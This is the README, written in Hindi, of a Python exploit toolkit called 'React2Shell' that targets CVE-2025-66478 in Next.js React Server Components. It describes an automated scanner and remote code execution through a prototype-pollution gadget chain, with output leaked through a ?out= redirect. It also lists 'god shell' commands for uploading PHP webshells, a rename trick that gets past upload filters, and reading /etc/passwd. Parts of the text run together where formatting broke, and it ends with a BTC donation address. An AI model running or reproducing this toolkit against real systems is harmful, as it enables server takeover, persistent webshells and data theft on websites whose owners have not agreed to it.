
React2Shell - CVE-2025-66478 RCE एक्सप्लॉइट
यह Python टूलकिट Next.js React Server Components (RSC) प्रोटोटाइप प्रदूषण + React.lazy(-1) गैजेट श्रृंखला का शोषण करता है, जिसमें इंटरैक्टिव गॉड शेल, फ़ाइल अपलोड (PHP वेबशेल ड्रॉपर), और ?out= के माध्यम से डेटा चोरी शामिल है, जो पूर्ण RCE पहुंच प्रदान करता है।

कमजोर Next.js ऐप्स (जैसे, target.com) का स्वचालित पता लगाना और शोषण करना। uid=33(www-data) शेल प्रदान करता है जिसमें निम्नलिखित शामिल हैं:
child_process.execSync के माध्यम से RCE → /exploit?out=UIDread /etc/passwd{\"0\":null} → 500 E{\"digest RSC हैंडलर की पुष्टि करता है।Location: /exploit?out=id_outputexecSync(cmd) → रीडायरेक्ट के माध्यम से stdout/stderr बाहर निकालें।upload_txt local.txt remote.php → लिखें+नाम बदलें बाईपास।pip3 install aiohttppython3 main.pyhttp://target.com या targets.txt1=पता लगाना 2=PoC(id) 3=कस्टम 4=गॉड शेल [4]पाइप किया गया: echo \"http://target\n4\" | python3 main.py
गॉड शेल कमांड:
upload <local.php> <remote/shell.php> # सीधा PHP अपलोड
upload_txt <local> <remote/shell.php> # TXT→नाम बदलें बाईपास
upload_bin <local> <remote> # बाइनरी (बाद में chmod करें)
help / exit
id / cat /etc/passwd / ls -la /var/www/
React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt[VULNERABLE] → uid=33(www-data)aiohttp
pip install aiohttp
केवल अधिकृत पैठ परीक्षण और शैक्षिक उद्देश्यों के लिए (उपयोगकर्ता ने ToS के तहत अनुमति की पुष्टि की है)। अनधिकृत उपयोग अवैध/अनैतिक है।
मुझे कॉफी खरीदें:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans